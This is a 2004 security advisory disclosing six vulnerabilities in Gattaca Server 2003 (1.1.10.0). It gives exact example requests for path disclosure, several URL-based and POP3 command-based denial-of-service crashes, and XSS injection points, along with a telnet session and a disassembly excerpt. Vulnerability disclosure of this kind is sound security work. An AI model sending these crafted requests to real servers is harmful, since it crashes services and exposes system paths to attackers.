                                     

 				www.r34ct.tk

     			      Security Advisory


Advisory Name: Gattaca Server 2003 (1.1.10.0)
 Release Date: 07/15/2004
  Application: Gattaca Server 2003 (1.1.10.0)
     Platform: Windows XP/NT
     Severity: Medium
     Author: dr_insane (dr_insane@pathfinder.gr)


Description:
A high performance Windows NT based Mail and Web Server software for building own intranet. You may
register unlimited users, use unlimited domains. Supporting POP3, SMTP, and HTTP protocols. Integrated 
with TMPL library, allow you write own CGI scripts.
Multiple vulnerabilities have been identified in Gattaca server 2003 that may allow a remote attacker
to compromise a remote system.


Details:

Issue #1: Installation path exposure

A malicious user can gain knowledge of the installation path by sending a null byte to the server.

example: http://[host]/%00

Output:
--------------------------------------------------------------------------------
(X)TMPL error
File [C:\Program Files\Gattaca Server\doc\webadmin\index.cgi] not found or invalid
Virtual Host at C:\Program Files\Gattaca Server\doc\webadmin\
--------------------------------------------------------------------------------


Issue #2: WWW-root path exposure

There is a second vulnerability that can be used to reveal the WWw root directory.Input passed to the "Language"
parameter in certain scripts isn't properly sanitised before being returned to the user.

example: http://[host]/web.tmpl?HELPID=8000&TEMPLATE=skins//water&LANGUAGE=[whatever]

Output:
(X)TMPL error
File /whatever/_head.tmpl not found or invalid
Virtual Host at C:\GeeOSPub\wwwroot\
--------------------------------------------------------------------------------
 
--------------------------------------------------------------------------------
(X)TMPL error
File /whatever/web.tmpl not found or invalid
Virtual Host at C:\GeeOSPub\wwwroot\
--------------------------------------------------------------------------------
 
--------------------------------------------------------------------------------
(X)TMPL error
File /whatever/_foot.tmpl not found or invalid
Virtual Host at C:\GeeOSPub\wwwroot\
--------------------------------------------------------------------------------
 
Issue #3: Denial of Service attack

The third issue is a denial of service attack that can be used to to slow a remote system. The CPU usage
will hit 100% and the server will become unavailable.

Examples:
http://[host]/index.tmpl?HELPID=1000&TEMPLATE=skins//water&LANGUAGE=/
http://[host]/web.tmpl?HELPID=8000&TEMPLATE=skins//water&LANGUAGE=/../../../../
http://[host]/web.tmpl?HELPID=8000&TEMPLATE=skins//water&LANGUAGE=.
http://[host]/web.tmpl?HELPID=8000&TEMPLATE=skins//water&LANGUAGE=/
http://[host]/web.tmpl?HELPID=8000&TEMPLATE=skins//water&LANGUAGE=\
http://[host]/web.tmpl?HELPID=8000&TEMPLATE=skins//[whatever]&LANGUAGE=lang//en

issue #4: Cross site scripting injection

Another vulnerability has been found in Gattaca server , which can be exploited by malicous people to conduct XSS attacks.
This can be exploited by creating a malicious link including script code, which will be executed in a user's browser when
the link is clicked or a malicious web site is visited. Successful exploitation may result in disclosure of various 
information (eg. cookie-based authentication information) associated with the site running OmniHTTPd or inclusion of
malicious content, which the user thinks is part of the real website.

examples:
http://[host]/web.tmpl?HELPID=8000&TEMPLATE=skins//water&LANGUAGE=[code]//[code]
http://[host]/web.tmpl?HELPID=8000&TEMPLATE=[code]//[code]&LANGUAGE=lang//en


issue #5: Denial of service attack [2]
Gattacca Server fails to handle multiple open connections on ports 25/tcp and 110/tcp. By establishing about 600 
connections on port 25 or port 110 the server will crash.


issue #6: Denial of service attack [3] - message handling

By connecting and authenticating on POP3 service a remote user can crash Gattaca service. There are multiple problems
in the way the servers handles the commands list, retr and uidl. 

example: 
C:\>telnet r34ct-krew 110
+OK GeeOS/1.1 POP3 Server ver 1.0, ready :-).<3824.50a943410378@pomonis>
user test
+OK User name accepted, password please :-|
pass w
+OK GeeOS mail box open ;-)
list 99999999999999999999999
retr 99999999999999999999999
uidl 98409583490583409539405

The commands above will crash the server. An error message will be generate:
"Unhandled exception in: geeosserv.exe (TMAIL.DLL):0x0000005: access violation.

-------------snip---------------
0037A382   or          eax,eax
0037A384   je          0037A4C5
0037A38A   mov         edi,eax
0037A38C   shl         edi,4
0037A38F   cmp         dword ptr [ebp+edi-7624h],0FFh
0037A397   je          0037A46F
0037A39D   mov         edi,eax
0037A39F   shl         edi,4
0037A3A2   cmp         byte ptr [ebp+edi-762Ch],0
0037A3AA   je          0037A416
0037A3AC   mov         edi,eax
0037A3AE   mov         esi,edi
0037A3B0   shl         esi,4
------------snip----------------

Workaround:
Use another product


Credit:
Dr_insane
Http://members.lycos.co.uk/r34ct/


Feedback
Please send your comments to: dr_insane@pathfinder.gr